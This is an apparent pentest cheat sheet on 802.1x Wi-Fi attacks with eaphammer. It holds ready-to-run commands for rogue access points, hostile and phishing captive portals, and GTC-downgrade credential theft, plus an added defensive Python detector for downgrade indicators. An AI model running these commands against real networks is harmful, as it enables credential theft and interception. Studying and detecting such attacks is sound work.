802.1x
MiTM
The --hostile-portal option makes eaphammer start Responder itself. Depending on the scenario, drop --hostile-portal and run tools such as Responder or Bettercap yourself. In both cases, add the target identity (with its password or NT hash) to eaphammer's database first so that the client's EAP authentication to the rogue AP succeeds and it associates.
Hostile portal (Responder started by eaphammer):
./ehdb --add --identity <user> [--password <password> | --nt-hash <NT>]
./eaphammer -i wlan0 -b <BSSID> -e <ESSID> -c <channel> --auth wpa-eap --hostile-portal
Captive portal (phishing):
./ehdb --add --identity <user> [--password <password> | --nt-hash <NT>]
./eaphammer -i wlan0 -b <BSSID> -e <ESSID> -c <channel> --auth wpa-eap --captive-portal
For the phishing scenarios see here.
Stealing credentials - GTC downgrade
During the negotiation there are two indicators visible on the wireless endpoint: an EAP method that the legitimate AP does not support is proposed, and the EAP methods are proposed in a different order.
Effective against Android phones.
Effective against iOS, but the user is prompted to trust the certificate.
Against Windows only a challenge-response (MSCHAPv2) can be captured; the native supplicant does not fall back to GTC.
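The two indicators above can be checked mechanically from the EAP messages a supplicant sees. The following is an added example, not code from the page or from eaphammer: it parses raw EAP packets (RFC 3748 framing: code, identifier, length, type) in the order the supplicant processed them (phase 2 messages as decrypted inside the tunnel), records which methods the AP proposed, and flags both a method the legitimate AP never offers (the GTC downgrade) and a changed proposal order. The packet sequences, the identity `alice`, the expected order `LEGIT_AP_ORDER` and the placeholder type-data bytes are all constructed for the example.

```python
"""Spot the two GTC-downgrade indicators in an EAP exchange (added example).

Parses raw EAP packets (RFC 3748: code, id, length, type, type-data) as a
supplicant saw them and compares the methods the AP proposed with the method
set and order of the legitimate AP. All packet sequences below are constructed.
"""
import struct

EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_TYPE_IDENTITY = 1
EAP_TYPE_NAK = 3  # Response/Nak: supplicant rejects the offered method, lists the ones it wants
# EAP method type codes from the IANA EAP registry
EAP_TYPES = {4: "MD5", 6: "GTC", 13: "TLS", 21: "TTLS", 25: "PEAP",
             26: "MSCHAPV2", 43: "FAST"}


def eap_packet(code, ident, eap_type=None, data=b""):
    """Build one EAP packet; used only to construct the sample traffic."""
    body = b"" if eap_type is None else bytes([eap_type]) + data
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


def parse_eap(packet):
    """Return (code, identifier, type-or-None, type-data) for a raw EAP packet."""
    if len(packet) < 4:
        raise ValueError("truncated EAP header")
    code, ident, length = struct.unpack("!BBH", packet[:4])
    if length < 4 or length > len(packet):
        raise ValueError("bad EAP length field")
    if length == 4:  # Success/Failure carry no type byte
        return code, ident, None, b""
    return code, ident, packet[4], packet[5:length]


def offered_methods(packets):
    """Methods the AP proposed, in order, taken from its EAP-Request packets."""
    offered = []
    for pkt in packets:
        code, _, eap_type, _ = parse_eap(pkt)
        if code != EAP_REQUEST or eap_type in (None, EAP_TYPE_IDENTITY):
            continue  # skip responses, Identity requests and Success/Failure
        name = EAP_TYPES.get(eap_type, "type%d" % eap_type)
        if not offered or offered[-1] != name:  # collapse multi-round methods
            offered.append(name)
    return offered


def downgrade_indicators(packets, legit_order):
    """Return one finding per indicator; an empty list means the negotiation
    matches what the legitimate AP would do."""
    offered = offered_methods(packets)
    findings = []
    foreign = [m for m in offered if m not in legit_order]
    if foreign:
        findings.append("method(s) not supported by the legitimate AP: " + ", ".join(foreign))
    seen = [m for m in offered if m in legit_order]
    expected = [m for m in legit_order if m in seen]
    if seen != expected:
        findings.append("methods proposed in a different order: %s (expected %s)"
                        % (" > ".join(seen), " > ".join(expected)))
    return findings


# Constructed: the legitimate AP proposes PEAP, falls back to TTLS, inner MSCHAPv2.
LEGIT_AP_ORDER = ["PEAP", "TTLS", "MSCHAPV2"]

# Constructed legitimate exchange (type-data bytes are placeholders, not real TLS/MSCHAPv2).
LEGIT = [
    eap_packet(EAP_REQUEST, 1, EAP_TYPE_IDENTITY),
    eap_packet(EAP_RESPONSE, 1, EAP_TYPE_IDENTITY, b"alice"),
    eap_packet(EAP_REQUEST, 2, 25, b"\x20"),          # PEAP start
    eap_packet(EAP_RESPONSE, 2, 25, b"\x00"),
    eap_packet(EAP_REQUEST, 3, 26, b"\x01\x03\x00\x0a\x10"),  # inner MSCHAPv2 challenge
]

# Constructed GTC downgrade: inside the PEAP tunnel the rogue AP asks for the
# cleartext password with EAP-GTC; a hardened supplicant Naks it and asks for MSCHAPv2.
ROGUE_GTC = [
    eap_packet(EAP_REQUEST, 1, EAP_TYPE_IDENTITY),
    eap_packet(EAP_RESPONSE, 1, EAP_TYPE_IDENTITY, b"alice"),
    eap_packet(EAP_REQUEST, 2, 25, b"\x20"),
    eap_packet(EAP_RESPONSE, 2, 25, b"\x00"),
    eap_packet(EAP_REQUEST, 3, 6, b"Password: "),
    eap_packet(EAP_RESPONSE, 3, EAP_TYPE_NAK, bytes([26])),
    eap_packet(EAP_REQUEST, 4, 26, b"\x01\x04\x00\x0a\x10"),
]

# Constructed order change: the rogue AP proposes TTLS before PEAP.
ROGUE_ORDER = [
    eap_packet(EAP_REQUEST, 1, EAP_TYPE_IDENTITY),
    eap_packet(EAP_RESPONSE, 1, EAP_TYPE_IDENTITY, b"alice"),
    eap_packet(EAP_REQUEST, 2, 21, b"\x20"),
    eap_packet(EAP_RESPONSE, 2, EAP_TYPE_NAK, bytes([25])),
    eap_packet(EAP_REQUEST, 3, 25, b"\x20"),
    eap_packet(EAP_RESPONSE, 3, 25, b"\x00"),
    eap_packet(EAP_REQUEST, 4, 26, b"\x01\x04\x00\x0a\x10"),
]

if __name__ == "__main__":
    for label, pkts in (("legit", LEGIT), ("rogue gtc", ROGUE_GTC), ("rogue order", ROGUE_ORDER)):
        print(label, "->", downgrade_indicators(pkts, LEGIT_AP_ORDER) or ["no indicator"])
```

The check only sees what the supplicant itself decoded, so it belongs on the endpoint (or in a supplicant log), not on a passive sniffer, which cannot read phase 2 inside the TLS tunnel.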
Balanced approach (default)
Phase 1 (outer authentication): PEAP,TTLS,TLS,FAST
Phase 2 (inner authentication): GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
./eaphammer -i <wlan0> --auth wpa-eap -e <ESSID> --creds -c <same_channel> -b <similar_BSSID>
Weakest to strongest
Phase 1 (outer authentication): PEAP,TTLS,TLS,FAST
Phase 2 (inner authentication): GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS
./eaphammer -i <wlan0> --negotiate weakest --auth wpa-eap -e <ESSID> --creds -c <channel> -b <BSSID>
Explicit GTC downgrade
./eaphammer -i <wlan0> --negotiate gtc-downgrade --auth wpa-eap -e <ESSID> --creds -c <channel> -b <BSSID>